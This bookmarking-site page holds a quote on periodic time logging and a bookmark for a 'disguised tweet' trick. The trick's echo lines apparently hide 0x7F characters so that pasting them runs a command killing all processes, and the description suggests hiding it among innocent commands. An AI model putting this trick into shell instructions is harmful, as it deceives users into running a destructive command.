"Time logging is the intelligent choice to ensure optimal productivity without increasing your hours. But time logging need only be done periodically to provide these benefits. I do it for one week every 3-6 months, and over the years it has made a huge difference for me, always providing me with new distinctions. If I go too many months without time logging, my productivity gradually drops as I fall back into unconscious time-wasting habits."
productivity  hack  cool  time  efficiency 
july 2013 by dandv
Disguised tweet to terminate all processes
echo '$1$2$3$4$5'
echo 'skeptical?' -l -z9 -n1

Visible when pasting. Uses the hidden 0x7F character to delete characters behind. Sneak it in a larger innocent-looking block of commands.
cool  hack  kill  hidden  character  delete  paste  fun 
july 2013 by dandv
« earlier      
per page:    204080120160

related tags

4chan  abuse  accelerometer  access  ACLU  acoustic  Adams  adaptive  against  agenda  air  airfare  airplane  airport  alcohol  alien  AMP  analytics  Android  animation  anti  Apple  application  art  ASCII  Ashley  aspect  assistant  attack  awareness  backdoor  badUSB  band  bank  battle  behavior  BigQuery  biometrics  Bitcoin  blades  blog  book  booking  bookmark  bookmarklet  boost  bot  botnet  bounty  brain  breach  break  browser  bug  bypass  C  C++  c4  camera  camouflage  CAPTCHA  car  card  cat  CD  cell  Cellebrite  CelleBrite  channel  character  cheap  cheat  China  Chrome  class  clean  client  coating  code  college  color  command  comparison  compiler  computer  conference  connections  console  content  control  controller  convert  cool  cooling  countdown  crack  Craig  creative  credit  crowdsourcing  cruel  crypto  CSS  culture  Cyanogen  CyanogenMod  data  database  DDoS  decrypt  deductions  default  defeat  delete  demo  details  detect  detection  development  device  DevTools  dial  Diego  digital  disable  disclosure  disk  display  distribution  distro  DIY  DNS  download  DRAM  drone  drunk  EdgeRank  education  effect  efficiency  eggs  electric  electricity  electronic  elite  encode  end  English  enhance  epilepsy  error  escape  espionage  Ethernet  Europe  evasion  example  exercise  exploit  face  Facebook  facial  faith  fake  fan  fashion  federal  female  file  filter  fingerprint  fingerprints  Firewire  firmware  first  fish  fix  flight  fluid  font  food  formal  fraud  free  freeware  friends  full  fun  game  geek  gender  get  GitHub  Google  GPS  grid  grow  GSM  habits  hack  hacked  hacking  hacks  hand  hard  hardware  hashed  heart  height  hidden  hilarious  history  howto  humor  idea  identify  ideology  image  immigration  improve  increase  India  influence  information  infosec  infrastructure  initial  inject  injection  Intel  intercept  Internet  interruptions  intro  invasive  iOS  iPad  iPhone  IRS  ISIS  J2EE  JAPH  JavaScript  jiujitsu  job  joke  keyboard  keylogger  keys  kill  Kinect  kitchen  knife  language  latest  law  layout  leak  learn  learning  legal  libertarian  lifehacks  LinkedIn  Linux  list  live  login  low  luggage  Lyft  machine  Madison  malware  Maps  maximize  Meet  meeting  memory  meteor  Michigan  microwave  middle  mind  mobile  mod  modding  monitor  Montuori  Motorola  movie  music  mystery  name  network  networking  neuroscience  news  noise  npm  nudge  numbers  of  online  OOB  open  open-source  out  palm  panel  paradigm-shift  parody  password  passwords  past  paste  paternalism  Paypal  pee  penetration  percentage  performance  Perl  personal  phishing  phone  phonetic  phonetics  photo  photography  plane  play  police  politics  poll  powder  power  price  printing  privacy  productivity  profile  profiles  programming  prohibition  psychology  QR  Quora  radio  RAM  rank  ratio  razr  reality  recognition  records  recruiting  reference  registry  remote  remove  research  resistance  resistence  ridicruel  rights  road  ROM  Romanian  router  RSA  rules  safety  Samsung  San  sandbox  scandal  scanner  scary  school  Scott  screen  script  SDK  search  security  securty  self  sensitive  sensor  service  SETI  sewage  ship  side  sign  signal  SIM  SIMlock  Siri  site  slide  smart  smartphone  sniffing  social  software  solution  Sood  sound  source  spam  spoofing  SQL  StackOverflow  stairs  startup  state  statistics  status  steal  stop  study  stupid  sucks  suit  surveillance  synthesis  synthetic  targeted  tax  tech  technology  TEDx  telemarketers  testing  text  theater  theft  ticket  tickets  time  tips  tools  top  tracking  traffic  training  transform  travel  TSA  tutorial  TV  tweak  UAV  Uber  UK  Unicode  university  unlock  update  upgrade  USA  USB  useless  user  verbal  version  video  virus  visa  vision  visit  voice  voter  voters  vulnerability  W4  war  warantless  water  web  webdesign  WebGoat  weight  width  WiFi  Windows  wired  wireless  women  word  workaround  XP  XSS  Yahoo!  YouTube  Zalgo  zombie 

Copy this bookmark: